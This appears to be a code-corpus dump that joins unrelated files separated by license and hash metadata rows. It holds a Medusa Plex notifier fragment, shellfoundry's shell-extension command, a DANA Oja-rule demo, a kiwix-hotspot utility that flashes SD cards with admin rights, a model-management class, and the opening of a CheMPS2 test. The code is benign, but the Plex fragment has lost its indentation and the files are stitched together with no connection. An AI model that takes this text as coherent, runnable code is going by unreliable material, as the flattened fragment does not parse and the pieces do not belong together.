if app.NOTIFY_ON_LOGIN:
update_text = common.notifyStrings[common.NOTIFY_LOGIN_TEXT]
title = common.notifyStrings[common.NOTIFY_LOGIN]
if update_text and title and ipaddress:
self._notify_pht(update_text.format(ipaddress), title)
def test_notify_pht(self, host, username, password):
return self._notify_pht('This is a test notification from Medusa',
'Test Notification', host, username, password, force=True)
def test_notify_pms(self, host, username, password, plex_server_token):
return self.update_library(host=host, username=username, password=password,
plex_server_token=plex_server_token, force=True)
def update_library(self, ep_obj=None, host=None, # pylint: disable=too-many-arguments, too-many-locals, too-many-statements, too-many-branches
username=None, password=None,
plex_server_token=None, force=False):
"""Handles updating the Plex Media Server host via HTTP API
Plex Media Server currently only supports updating the whole video library and not a specific path.
Returns:
Returns None for no issue, else a string of host with connection issues
"""
if not (app.USE_PLEX_SERVER and app.PLEX_UPDATE_LIBRARY) and not force:
return None
host = host or app.PLEX_SERVER_HOST
if not host:
logger.log(u'PLEX: No Plex Media Server host specified, check your settings', logger.DEBUG)
return False
if not self.get_token(username, password, plex_server_token):
logger.log(u'PLEX: Error getting auth token for Plex Media Server, check your settings', logger.WARNING)
return False
file_location = '' if not ep_obj else ep_obj.location
host_list = {x.strip() for x in host.split(',') if x.strip()}
        # keep these as separate dicts; aliasing them would break the "all hosts" fallback below
        hosts_all = {}
        hosts_match = {}
hosts_failed = set()
for cur_host in host_list:
url = 'http{0}://{1}/library/sections'.format(('', 's')[bool(app.PLEX_SERVER_HTTPS)], cur_host)
try:
xml_response = getURL(url, headers=self.headers, session=self.session, returns='text')
if not xml_response:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(cur_host), logger.WARNING)
hosts_failed.add(cur_host)
continue
media_container = etree.fromstring(xml_response)
except IOError as error:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
continue
except Exception as error:
if 'invalid token' in str(error):
logger.log(u'PLEX: Please set TOKEN in Plex settings: ', logger.WARNING)
else:
logger.log(u'PLEX: Error while trying to contact Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
continue
sections = media_container.findall('.//Directory')
if not sections:
logger.log(u'PLEX: Plex Media Server not running on: {0}'.format
(cur_host), logger.DEBUG)
hosts_failed.add(cur_host)
continue
for section in sections:
if 'show' == section.attrib['type']:
keyed_host = [(str(section.attrib['key']), cur_host)]
hosts_all.update(keyed_host)
if not file_location:
continue
for section_location in section.findall('.//Location'):
section_path = re.sub(r'[/\\]+', '/', section_location.attrib['path'].lower())
section_path = re.sub(r'^(.{,2})[/\\]', '', section_path)
location_path = re.sub(r'[/\\]+', '/', file_location.lower())
location_path = re.sub(r'^(.{,2})[/\\]', '', location_path)
if section_path in location_path:
hosts_match.update(keyed_host)
if force:
return (', '.join(set(hosts_failed)), None)[not len(hosts_failed)]
if hosts_match:
logger.log(u'PLEX: Updating hosts where TV section paths match the downloaded show: ' + ', '.join(set(hosts_match)), logger.DEBUG)
else:
logger.log(u'PLEX: Updating all hosts with TV sections: ' + ', '.join(set(hosts_all)), logger.DEBUG)
hosts_try = (hosts_match.copy(), hosts_all.copy())[not len(hosts_match)]
for section_key, cur_host in iteritems(hosts_try):
url = 'http{0}://{1}/library/sections/{2}/refresh'.format(('', 's')[bool(app.PLEX_SERVER_HTTPS)], cur_host, section_key)
try:
getURL(url, headers=self.headers, session=self.session, returns='text')
except Exception as error:
logger.log(u'PLEX: Error updating library section for Plex Media Server: {0}'.format
(ex(error)), logger.WARNING)
hosts_failed.add(cur_host)
return (', '.join(set(hosts_failed)), None)[not len(hosts_failed)]
def get_token(self, username=None, password=None, plex_server_token=None):
username = username or app.PLEX_SERVER_USERNAME
password = password or app.PLEX_SERVER_PASSWORD
plex_server_token = plex_server_token or app.PLEX_SERVER_TOKEN
if plex_server_token:
self.headers['X-Plex-Token'] = plex_server_token
if 'X-Plex-Token' in self.headers:
return True
if not (username and password):
return True
logger.log(u'PLEX: fetching plex.tv credentials for user: ' + username, logger.DEBUG)
params = {
'user[login]': username,
'user[password]': password
}
try:
response = getURL('https://plex.tv/users/sign_in.json',
post_data=params,
headers=self.headers,
session=self.session,
returns='json')
self.headers['X-Plex-Token'] = response['user']['authentication_token']
except Exception as error:
self.headers.pop('X-Plex-Token', '')
logger.log(u'PLEX: Error fetching credentials from from plex.tv for user {0}: {1}'.format
(username, error), logger.DEBUG)
return 'X-Plex-Token' in self.headers
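# Illustrative usage (assumes Medusa's app.* settings are populated; host and credentials are examples):
#
#   notifier = Notifier()
#   notifier.test_notify_pms("localhost:32400", "user", "secret", plex_server_token=None)
#   notifier.update_library()   # refresh the TV sections of every configured PMS host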
| gpl-3.0 | 4,151,996,194,805,680,000 | 42.219512 | 178 | 0.586155 | false | 4.125728 | false | false | false |
QualiSystems/shellfoundry | shellfoundry/commands/extend_command.py | 1 | 6915 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import re
import shutil
import click
from shellfoundry.exceptions import VersionRequestException
from shellfoundry.utilities.config_reader import CloudShellConfigReader, Configuration
from shellfoundry.utilities.constants import (
METADATA_AUTHOR_FIELD,
TEMPLATE_AUTHOR_FIELD,
TEMPLATE_BASED_ON,
)
from shellfoundry.utilities.modifiers.definition.definition_modification import (
DefinitionModification,
)
from shellfoundry.utilities.repository_downloader import RepositoryDownloader
from shellfoundry.utilities.temp_dir_context import TempDirContext
from shellfoundry.utilities.validations import (
ShellGenerationValidations,
ShellNameValidations,
)
class ExtendCommandExecutor(object):
LOCAL_TEMPLATE_URL_PREFIX = "local:"
SIGN_FILENAME = "signed"
ARTIFACTS = {"driver": "src", "deployment": "deployments"}
def __init__(
self,
repository_downloader=None,
shell_name_validations=None,
shell_gen_validations=None,
):
"""Creates a new shell based on an already existing shell.
:param RepositoryDownloader repository_downloader:
:param ShellNameValidations shell_name_validations:
"""
self.repository_downloader = repository_downloader or RepositoryDownloader()
self.shell_name_validations = shell_name_validations or ShellNameValidations()
self.shell_gen_validations = (
shell_gen_validations or ShellGenerationValidations()
)
self.cloudshell_config_reader = Configuration(CloudShellConfigReader())
def extend(self, source, attribute_names):
"""Create a new shell based on an already existing shell.
:param str source: The path to the existing shell. Can be a url or local path
:param tuple attribute_names: Sequence of attribute names that should be added
"""
with TempDirContext("Extended_Shell_Temp_Dir") as temp_dir:
try:
if self._is_local(source):
temp_shell_path = self._copy_local_shell(
self._remove_prefix(
source, ExtendCommandExecutor.LOCAL_TEMPLATE_URL_PREFIX
),
temp_dir,
)
else:
temp_shell_path = self._copy_online_shell(source, temp_dir)
except VersionRequestException as err:
raise click.ClickException(str(err))
except Exception:
raise click.BadParameter("Check correctness of entered attributes")
# Remove shell version from folder name
shell_path = re.sub(r"-\d+(\.\d+)*/?$", "", temp_shell_path)
os.rename(temp_shell_path, shell_path)
if not self.shell_gen_validations.validate_2nd_gen(shell_path):
raise click.ClickException("Invalid second generation Shell.")
modificator = DefinitionModification(shell_path)
self._unpack_driver_archive(shell_path, modificator)
self._remove_quali_signature(shell_path)
self._change_author(shell_path, modificator)
self._add_based_on(shell_path, modificator)
self._add_attributes(shell_path, attribute_names)
try:
shutil.move(shell_path, os.path.curdir)
except shutil.Error as err:
raise click.BadParameter(str(err))
click.echo("Created shell based on source {}".format(source))
def _copy_local_shell(self, source, destination):
"""Copy shell and extract if needed."""
if os.path.isdir(source):
source = source.rstrip(os.sep)
name = os.path.basename(source)
ext_shell_path = os.path.join(destination, name)
shutil.copytree(source, ext_shell_path)
else:
            # a bare `raise` has no active exception here; fail with an explicit error instead
            raise ValueError("{} is not an existing shell directory".format(source))
return ext_shell_path
def _copy_online_shell(self, source, destination):
"""Download shell and extract it."""
archive_path = None
try:
archive_path = self.repository_downloader.download_file(source, destination)
ext_shell_path = (
self.repository_downloader.repo_extractor.extract_to_folder(
archive_path, destination
)
)
ext_shell_path = ext_shell_path[0]
finally:
if archive_path and os.path.exists(archive_path):
os.remove(archive_path)
return os.path.join(destination, ext_shell_path)
@staticmethod
def _is_local(source):
return source.startswith(ExtendCommandExecutor.LOCAL_TEMPLATE_URL_PREFIX)
@staticmethod
def _remove_prefix(string, prefix):
return string.rpartition(prefix)[-1]
def _unpack_driver_archive(self, shell_path, modificator=None):
"""Unpack driver files from ZIP-archive."""
if not modificator:
modificator = DefinitionModification(shell_path)
artifacts = modificator.get_artifacts_files(
artifact_name_list=list(self.ARTIFACTS.keys())
)
for artifact_name, artifact_path in artifacts.items():
artifact_path = os.path.join(shell_path, artifact_path)
if os.path.exists(artifact_path):
self.repository_downloader.repo_extractor.extract_to_folder(
artifact_path,
os.path.join(shell_path, self.ARTIFACTS[artifact_name]),
)
os.remove(artifact_path)
@staticmethod
def _remove_quali_signature(shell_path):
"""Remove Quali signature from shell."""
signature_file_path = os.path.join(
shell_path, ExtendCommandExecutor.SIGN_FILENAME
)
if os.path.exists(signature_file_path):
os.remove(signature_file_path)
def _change_author(self, shell_path, modificator=None):
"""Change shell authoring."""
author = self.cloudshell_config_reader.read().author
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.edit_definition(field=TEMPLATE_AUTHOR_FIELD, value=author)
modificator.edit_tosca_meta(field=METADATA_AUTHOR_FIELD, value=author)
def _add_based_on(self, shell_path, modificator=None):
"""Add Based_ON field to shell-definition.yaml file."""
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.add_field_to_definition(field=TEMPLATE_BASED_ON)
def _add_attributes(self, shell_path, attribute_names, modificator=None):
"""Add a commented out attributes to the shell definition."""
if not modificator:
modificator = DefinitionModification(shell_path)
modificator.add_properties(attribute_names=attribute_names)
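# Illustrative usage (paths and attribute names are made up for the example):
#
#   executor = ExtendCommandExecutor()
#   executor.extend("local:/path/to/MyShell", ("my_custom_attribute",))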
| apache-2.0 | 2,709,334,728,992,063,500 | 36.994505 | 88 | 0.635141 | false | 4.231946 | true | false | false |
rougier/dana | examples/oja.py | 1 | 3086 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright INRIA
# Contributors: Nicolas P. Rougier ([email protected])
#
# DANA is a computing framework for the simulation of distributed,
# asynchronous, numerical and adaptive models.
#
# This software is governed by the CeCILL license under French law and abiding
# by the rules of distribution of free software. You can use, modify and/ or
# redistribute the software under the terms of the CeCILL license as circulated
# by CEA, CNRS and INRIA at the following URL
# http://www.cecill.info/index.en.html.
#
# As a counterpart to the access to the source code and rights to copy, modify
# and redistribute granted by the license, users are provided only with a
# limited warranty and the software's author, the holder of the economic
# rights, and the successive licensors have only limited liability.
#
# In this respect, the user's attention is drawn to the risks associated with
# loading, using, modifying and/or developing or reproducing the software by
# the user in light of its specific status of free software, that may mean that
# it is complicated to manipulate, and that also therefore means that it is
# reserved for developers and experienced professionals having in-depth
# computer knowledge. Users are therefore encouraged to load and test the
# software's suitability as regards their requirements in conditions enabling
# the security of their systems and/or data to be ensured and, more generally,
# to use and operate it in the same conditions as regards security.
#
# The fact that you are presently reading this means that you have had
# knowledge of the CeCILL license and that you accept its terms.
# -----------------------------------------------------------------------------
'''
Implementation of the Oja learning rule for extracting the principal component
of an elliptical gaussian distribution. Given that the distribution is
elliptical, its principal component should be oriented along the main axis of
the distribution; therefore, the final weights should be +/-(cos(theta), sin(theta))
References:
-----------
E. Oja, "A Simplified Neuron Model as a Principal Component Analyzer"
Journal of Mathematical Biology 15: 267-273, 1982.
'''
from numpy import *
from dana import *
def sample(theta, mu1, std1, mu2, std2):
''' Random sample according to an elliptical Gaussian distribution'''
u1 = random.random()
u2 = random.random()
T1 = sqrt(-2.0*log(u1))*cos(2.0*pi*u2)
T2 = sqrt(-2.0*log(u1))*sin(2.0*pi*u2)
x = mu1 + (std1*T1*cos(theta) - std2*T2*sin(theta))
y = mu2 + (std1*T1*sin(theta) + std2*T2*cos(theta))
return np.array([x,y])
theta = -135.0 * pi / 180.0
src = Group((2,), 'V = sample(theta,0.0,1.0,0.0,0.5)')
tgt = Group((1,), 'V')
C = DenseConnection(src('V'), tgt('V'), np.ones((1,2)),
'dW/dt = post.V*(pre.V-post.V*W)')
run(time=10.0,dt=0.001)
print "Learned weights : ", C.weights[0]
print "(should be +/- [%f, %f])" % (cos(theta), sin(theta))
| bsd-3-clause | -3,846,490,947,212,068,000 | 44.382353 | 79 | 0.685677 | false | 3.510808 | false | false | false |
ideascube/pibox-installer | kiwix-hotspot/backend/util.py | 1 | 15466 | # -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
import os
import re
import sys
import time
import shlex
import signal
import ctypes
import tempfile
import threading
import subprocess
import data
from util import CLILogger
# windows-only flags to prevent sleep on executing thread
WINDOWS_SLEEP_FLAGS = {
# Enables away mode. This value must be specified with ES_CONTINUOUS.
# Away mode should be used only by media-recording and media-distribution
# applications that must perform critical background processing
# on desktop computers while the computer appears to be sleeping.
"ES_AWAYMODE_REQUIRED": 0x00000040,
# Informs the system that the state being set should remain in effect until
# the next call that uses ES_CONTINUOUS and one of the other state flags is cleared.
"ES_CONTINUOUS": 0x80000000,
# Forces the display to be on by resetting the display idle timer.
"ES_DISPLAY_REQUIRED": 0x00000002,
# Forces the system to be in the working state by resetting the system idle timer.
"ES_SYSTEM_REQUIRED": 0x00000001,
}
class CheckCallException(Exception):
def __init__(self, msg):
Exception(self, msg)
def startup_info_args():
if hasattr(subprocess, "STARTUPINFO"):
# On Windows, subprocess calls will pop up a command window by default
# when run from Pyinstaller with the ``--noconsole`` option. Avoid this
# distraction.
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
cf = subprocess.CREATE_NEW_PROCESS_GROUP
else:
si = None
cf = 0
return {"startupinfo": si, "creationflags": cf}
def subprocess_pretty_call(
cmd, logger, stdin=None, check=False, decode=False, as_admin=False
):
""" flexible subprocess helper running separately and using the logger
cmd: the command to be run
logger: the logger to send debug output to
stdin: pipe input into the command
check: whether it should raise on non-zero return code
decode: whether it should decode output (bytes) into UTF-8 str
as_admin: whether the command should be run as root/admin """
if as_admin:
if sys.platform == "win32":
if logger is not None:
logger.std("Call (as admin): " + str(cmd))
return run_as_win_admin(cmd, logger)
from_cli = logger is None or type(logger) == CLILogger
cmd = get_admin_command(cmd, from_gui=not from_cli, logger=logger)
# We should use subprocess.run but it is not available in python3.4
process = subprocess.Popen(
cmd,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
**startup_info_args()
)
if logger is not None:
logger.std("Call: " + str(process.args))
process.wait()
lines = (
[l.decode("utf-8", "ignore") for l in process.stdout.readlines()]
if decode
else process.stdout.readlines()
)
if logger is not None:
for line in lines:
logger.raw_std(line if decode else line.decode("utf-8", "ignore"))
if check:
if process.returncode != 0:
raise CheckCallException("Process %s failed" % process.args)
return lines
return process.returncode, lines
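# Illustrative usage (command is an example; CLILogger is imported from util above):
#
#   rc, lines = subprocess_pretty_call(["ls", "-l"], CLILogger(), decode=True)
#   if rc == 0:
#       print("".join(lines))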
def subprocess_pretty_check_call(cmd, logger, stdin=None, as_admin=False):
return subprocess_pretty_call(
cmd=cmd, logger=logger, stdin=stdin, check=True, as_admin=as_admin
)
def subprocess_timed_output(cmd, logger, timeout=10):
logger.std("Getting output of " + str(cmd))
return subprocess.check_output(
cmd, universal_newlines=True, timeout=timeout
).splitlines()
def subprocess_external(cmd, logger):
""" spawn a new process without capturing nor watching it """
logger.std("Opening: " + str(cmd))
subprocess.Popen(cmd)
def is_admin():
""" whether current process is ran as Windows Admin or unix root """
if sys.platform == "win32":
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except Exception:
return False
return os.getuid() == 0
def run_as_win_admin(command, logger):
""" run specified command with admin rights """
params = " ".join(['"{}"'.format(x) for x in command[1:]]).strip()
rc = ctypes.windll.shell32.ShellExecuteW(None, "runas", command[0], params, None, 1)
# ShellExecuteW returns 5 if user chose not to elevate
if rc == 5:
raise PermissionError()
return rc
def get_admin_command(command, from_gui, logger, log_to=None):
""" updated command to run it as root on macos or linux
from_gui: whether called via GUI. Using cli sudo if not """
if not from_gui:
return ["sudo"] + command
if sys.platform == "darwin":
# write command to a separate temp bash script
script = (
"#!/bin/bash\n\n{command} 2>&1 {redir}\n\n"
'if [ $? -eq 1 ]; then\n echo "!!! echer returned 1" {redir}\n'
" exit 11\nfi\n\n".format(
command=" ".join([shlex.quote(cmd) for cmd in command]),
redir=">>{}".format(log_to) if log_to else "",
)
)
# add script content to logger
logger.raw_std(script)
with tempfile.NamedTemporaryFile(mode="w", suffix=".sh", delete=False) as fd:
fd.write(script)
fd.seek(0)
return [
"/usr/bin/osascript",
"-e",
'do shell script "/bin/bash {command}" '
"with administrator privileges".format(command=fd.name),
]
if sys.platform == "linux":
return ["pkexec"] + command
class EtcherWriterThread(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._should_stop = False # stop flag
self.exp = None # exception to be re-raised by caller
def stop(self):
self._should_stop = True
@classmethod
def show_log(cls, logger, log_to_file, log_file, process, eof=False):
if log_to_file:
try:
with open(log_file.name, "r") as f:
lines = f.readlines()
if len(lines) >= 2:
lines.pop()
# working
if "Validating" in lines[-1] or "Flashing" in lines[-1]:
logger.std(lines[-1].replace("\x1b[1A", "").strip())
elif "[1A" in lines[-1]: # still working but between progress
logger.std(lines[-2].replace("\x1b[1A", "").strip())
else: # probably at end of file
for line in lines[-5:]:
logger.std(line.replace("\x1b[1A", "").strip())
except Exception as exp:
logger.err("Failed to read etcher log output: {}".format(exp))
if not log_to_file or eof:
for line in process.stdout:
logger.raw_std(line.decode("utf-8", "ignore"))
def run(self,):
image_fpath, device_fpath, logger = self._args
logger.step("Copy image to sd card using etcher-cli")
from_cli = logger is None or type(logger) == CLILogger
cmd, log_to_file, log_file = get_etcher_command(
image_fpath, device_fpath, logger, from_cli
)
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **startup_info_args()
)
logger.std("Starting Etcher: " + str(process.args))
# intervals in second
sleep_interval = 2
log_interval = 60
counter = 0
while process.poll() is None:
counter += 1
if self._should_stop: # on cancel
logger.std(". cancelling...")
break
time.sleep(sleep_interval)
# increment sleep counter until we reach log interval
if counter < log_interval // sleep_interval:
counter += 1
continue
# reset counter and display log
counter = 0
self.show_log(logger, log_to_file, log_file, process)
try:
logger.std(". has process exited?")
process.wait(timeout=2)
except subprocess.TimeoutExpired:
logger.std(". process exited")
# send ctrl^c
if sys.platform == "win32":
logger.std(". sending ctrl^C")
process.send_signal(signal.CTRL_C_EVENT)
process.send_signal(signal.CTRL_BREAK_EVENT)
time.sleep(2)
if process.poll() is None:
logger.std(". sending SIGTERM")
process.terminate() # send SIGTERM
time.sleep(2)
if process.poll() is None:
logger.std(". sending SIGKILL")
process.kill() # send SIGKILL (SIGTERM again on windows)
time.sleep(2)
else:
logger.std(". process exited")
if not process.returncode == 0:
self.exp = CheckCallException(
"Process returned {}".format(process.returncode)
)
# capture last output
self.show_log(logger, log_to_file, log_file, process, eof=True)
if log_to_file:
log_file.close()
try:
os.unlink(log_file.name)
except Exception as exp:
logger.err(str(exp))
logger.std(". process done")
logger.progress(1)
def prevent_sleep(logger):
if sys.platform == "win32":
logger.std("Setting ES_SYSTEM_REQUIRED mode to current thread")
ctypes.windll.kernel32.SetThreadExecutionState(
WINDOWS_SLEEP_FLAGS["ES_CONTINUOUS"]
| WINDOWS_SLEEP_FLAGS["ES_SYSTEM_REQUIRED"]
| WINDOWS_SLEEP_FLAGS["ES_DISPLAY_REQUIRED"]
)
return
if sys.platform == "linux":
def make_unmapped_window(wm_name):
from Xlib import display
screen = display.Display().screen()
window = screen.root.create_window(0, 0, 1, 1, 0, screen.root_depth)
window.set_wm_name(wm_name)
window.set_wm_protocols([])
return window
logger.std("Suspending xdg-screensaver")
wid = None
try:
# Create window to use with xdg-screensaver
window = make_unmapped_window("caffeinate")
wid = hex(window.id)
cmd = ["/usr/bin/xdg-screensaver", "suspend", wid]
logger.std("Calling {}".format(cmd))
p = subprocess.Popen(" ".join(cmd), shell=True)
p.wait()
if not p.returncode == 0:
raise OSError("xdg-screensaver returned {}".format(p.returncode))
except Exception as exp:
logger.err("Unable to disable sleep. Please do it manually.")
return wid
if sys.platform == "darwin":
cmd = ["/usr/bin/caffeinate", "-dsi"]
logger.std("Calling {}".format(cmd))
process = subprocess.Popen(cmd, **startup_info_args())
return process
def restore_sleep_policy(reference, logger):
if sys.platform == "win32":
logger.std("Restoring ES_CONTINUOUS mode to current thread")
ctypes.windll.kernel32.SetThreadExecutionState(
WINDOWS_SLEEP_FLAGS["ES_CONTINUOUS"]
)
return
if sys.platform == "linux":
logger.std("Resuming xdg-screensaver (wid #{})".format(reference))
if reference is not None:
subprocess_pretty_call(
["/usr/bin/xdg-screensaver", "resume", reference], logger
)
return
if sys.platform == "darwin":
logger.std("Stopping caffeinate process #{}".format(reference.pid))
reference.kill()
reference.wait(5)
return
def get_etcher_command(image_fpath, device_fpath, logger, from_cli):
# on macOS, GUI sudo captures stdout so we use a log file
log_to_file = not from_cli and sys.platform == "darwin"
if log_to_file:
log_file = tempfile.NamedTemporaryFile(
suffix=".log", delete=False, encoding="utf-8"
)
else:
log_file = None
cmd = [
os.path.join(
data.data_dir,
"etcher-cli",
"etcher" if sys.platform == "win32" else "balena-etcher",
),
"-c",
"-y",
"-u",
"-d",
device_fpath,
image_fpath,
]
# handle sudo or GUI alternative for linux and macOS
if sys.platform in ("linux", "darwin"):
cmd = get_admin_command(
cmd,
from_gui=not from_cli,
logger=logger,
log_to=log_file.name if log_to_file else None,
)
return cmd, log_to_file, log_file
def flash_image_with_etcher(image_fpath, device_fpath, retcode, from_cli=False):
""" flash an image onto SD-card
        use only with small images as there is no output capture on OSX
and it is not really cancellable.
retcode is a multiprocessing.Value """
logger = CLILogger()
cmd, log_to_file, log_file = get_etcher_command(
image_fpath, device_fpath, logger, from_cli
)
returncode, _ = subprocess_pretty_call(cmd, check=False, logger=logger)
retcode.value = returncode
if log_to_file:
try:
subprocess_pretty_call(["/bin/cat", log_file.name], logger, decode=True)
log_file.close()
os.unlink(log_file.name)
except Exception as exp:
logger.err(str(exp))
return returncode == 0
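# Illustrative usage (device path is an example; requires the bundled etcher-cli and admin rights):
#
#   import multiprocessing
#   retcode = multiprocessing.Value("i", -1)
#   ok = flash_image_with_etcher("/tmp/hotspot.img", "/dev/sdb", retcode, from_cli=True)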
def sd_has_single_partition(sd_card, logger):
""" whether sd_card consists of a single partition (expected to be clean) """
try:
if sys.platform == "darwin":
disk_prefix = re.sub(r"\/dev\/disk([0-9]+)", r"disk\1s", sd_card)
lines = subprocess_timed_output(["diskutil", "list", sd_card], logger)
nb_partitions = len(
[
line.strip().rsplit(" ", 1)[-1].replace(disk_prefix, "").strip()
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
elif sys.platform == "win32":
disk_prefix = re.sub(
r".+PHYSICALDRIVE([0-9+])", r"Disk #\1, Partition #", sd_card
)
lines = subprocess_timed_output(["wmic", "partition"], logger)
nb_partitions = len(
[
re.sub(r".+" + disk_prefix + r"([0-9]+).+", r"\1", line)
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
elif sys.platform == "linux":
disk_prefix = re.sub(r"\/dev\/([a-z0-9]+)", r"─\1", sd_card)
lines = subprocess_timed_output(["/bin/lsblk", sd_card], logger)
nb_partitions = len(
[
line.strip().split(" ", 1)[0].replace(disk_prefix, "").strip()
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
except Exception as exp:
logger.err(str(exp))
return False
| gpl-3.0 | 3,680,295,156,000,532,500 | 32.764192 | 88 | 0.563696 | false | 4.003106 | false | false | false |
Brett777/Predict-Churn | model_management/datascience_framework.py | 1 | 8515 | import os
import io
import sys
import dill
import copy
from datetime import datetime
from .evaluator import Evaluator
from .utils import (
post_to_platform,
get_current_notebook,
strip_output,
get_current_notebook,
mkdir_p,
)
class DataScienceFramework(object):
def __init__(
self,
model,
problem_class,
x_test,
y_test,
name=None,
description=None,
evaluator=Evaluator,
):
# assign variables to class
self.name = name
self.description = description
self.model = model
self.problem_class = problem_class
self.y_test = list(y_test)
self.x_test = list(x_test)
self.framework = model.__module__.split(".")[0]
# get environment data
self._meta_data = self.meta_data()
self.y_pred = self.predict()
# initialize evaluator
self.evaluator = Evaluator(self.problem_class)
# class methods
@classmethod
def load(cls, model_id):
# use hard coded string to load for now
with open(".model_cache/sklearn_model_cache.pkl", "rb") as file:
instance = dill.load(file)
instance.model = instance.parse_model(io.BytesIO(instance.model_serialized))
return instance
@classmethod
def project_models(cls):
query = """
query($service_name: String!) {
runnableInstance(serviceName: $service_name) {
runnable {
project {
name
models {
edges {
node {
id
name
description
problemClass
framework
objectClass
language
languageVersion
createdAt
updatedAt
rank
hyperParameters
structure
author {
fullName
}
metrics {
edges {
node {
key
value
}
}
}
diagnostics {
edges {
node {
... on ModelDiagnosticROC {
title
falsePositiveRates
truePositiveRates
thresholds
}
... on ModelDiagnosticResidual {
title
observations
residuals
}
... on ModelDiagnosticConfusionMatrix {
title
matrix
}
}
}
}
parameters {
edges {
node {
key
value
confidenceInterval {
positive
negative
}
}
}
}
}
}
}
}
}
}
}
"""
response = post_to_platform(
{"query": query, "variables": {"service_name": os.environ["SERVICE_NAME"]}}
)
response_data = response.json()["data"]
models = list(
map(
lambda edge: edge["node"],
response_data["runnableInstance"]["runnable"]["project"]["models"][
"edges"
],
)
)
return models
# framework dependent functions
def predict(self):
""" Make prediction based on x_test """
raise NotImplementedError
def framework_version(self):
""" Return version of the framework been used. """
raise NotImplementedError
def object_class(self):
""" Return name of the model object. """
raise NotImplementedError
def parameter(self):
""" Get parameter from model. """
raise NotImplementedError
def hyperparameter(self):
""" Get hyper parameter from model. """
raise NotImplementedError
def serialize_model(self):
""" Default methods for serialize model. """
return dill.dumps(self.model)
def parse_model(self, model_file):
""" Default methods for reading in model. """
return dill.load(model_file)
# base framework functions
def meta_data(self):
""" Capture environment meta data. """
meta_data_obj = {
"name": self.name,
"description": self.description,
"framework": self.framework,
"createdAt": datetime.now().isoformat(),
"sessionName": os.environ["SERVICE_NAME"],
"language": "python",
"languageVersion": ".".join(map(str, sys.version_info[0:3])),
}
return meta_data_obj
def diagnostics(self):
""" Return diagnostics of model. """
return [fn(self.y_test, self.y_pred) for fn in self.evaluator.diagnostics]
def metrics(self):
""" Return evaluation of model performance. """
return [fn(self.y_test, self.y_pred) for fn in self.evaluator.metrics]
def summary(self):
""" Return all infomation that will be stored. """
model_meta = {
"diagnostics": self.diagnostics(),
"metrics": self.metrics(),
"parameters": self.parameter(),
"frameworkVersion": self.framework_version(),
"hyperParameters": self.hyperparameter(),
"problemClass": self.problem_class,
"objectClass": self.object_class(),
}
model_meta.update(self._meta_data)
return model_meta
def save(self):
""" Save all information to platform. """
self.model_serialized = self.serialize_model()
# save model object locally for now
#mkdir_p(".model_cache")
#with open(".model_cache/sklearn_model_cache.pkl", "w") as file:
# dill.dump(self, file)
model_meta = self.summary()
model_meta.update(
{
"data": {"y_pred": list(self.y_pred), "y_test": list(self.y_test)},
"notebook": get_current_notebook(),
}
)
query = """
mutation($input: CreateModelInput!) {
createModel(input: $input) {
clientMutationId
}
}
"""
return post_to_platform({"query": query, "variables": {"input": model_meta}})
| mit | -343,225,543,429,373,700 | 34.92827 | 91 | 0.376864 | false | 6.416729 | true | false | false |
SebWouters/CheMPS2 | PyCheMPS2/tests/test12.py | 1 | 3497 | #
# CheMPS2: a spin-adapted implementation of DMRG for ab initio quantum chemistry
# Copyright (C) 2013-2018 Sebastian Wouters
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import numpy as np
import sys
import PyCheMPS2
import ctypes
# Set the seed of the random number generator and cout.precision
Initializer = PyCheMPS2.PyInitialize()
Initializer.Init()
#######################
### BCS Hamiltonian ###
#######################
eps = np.array([ -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5 ], dtype=ctypes.c_double)
L = len( eps )
g = -1.0
power = 0.0
Nelec = L # Number of fermions in the model = Number of single-particle states
TwoS = 0 # Twice the total spin
Irrep = 0 # No point group is used, Irrep should ALWAYS be zero.
'''
Model: h_ij = delta_ij eps[i]
v_ijkl = delta_ij delta_kl g ( eps[i] * eps[k] ) ^ {power}
h_ijkl = v_ijkl + ( delta_ik h_jl + delta_jl h_ik ) / ( N - 1 )
Ham = 0.5 sum_ijkl h_ijkl sum_sigma,tau a^+_{i,sigma} a^+_{j,tau} a_{l,tau} a_{k,sigma}
'''
# The Hamiltonian initializes all its matrix elements to 0.0
orbirreps = np.zeros( [ L ], dtype=ctypes.c_int )
group = 0
Ham = PyCheMPS2.PyHamiltonian( L, group, orbirreps )
# Setting up the Problem
Prob = PyCheMPS2.PyProblem( Ham, TwoS, Nelec, Irrep )
# Setting up the ConvergenceScheme
# setInstruction(instruction, D, Econst, maxSweeps, noisePrefactor)
OptScheme = PyCheMPS2.PyConvergenceScheme( 2 )
OptScheme.setInstruction( 0, 100, 1e-10, 10, 0.5 )
OptScheme.setInstruction( 1, 1000, 1e-10, 10, 0.0 )
# Run ground state calculation
theDMRG = PyCheMPS2.PyDMRG( Prob, OptScheme )
###############################################################################################
### Hack: overwrite the matrix elements with 4-fold symmetry directly in the Problem object ###
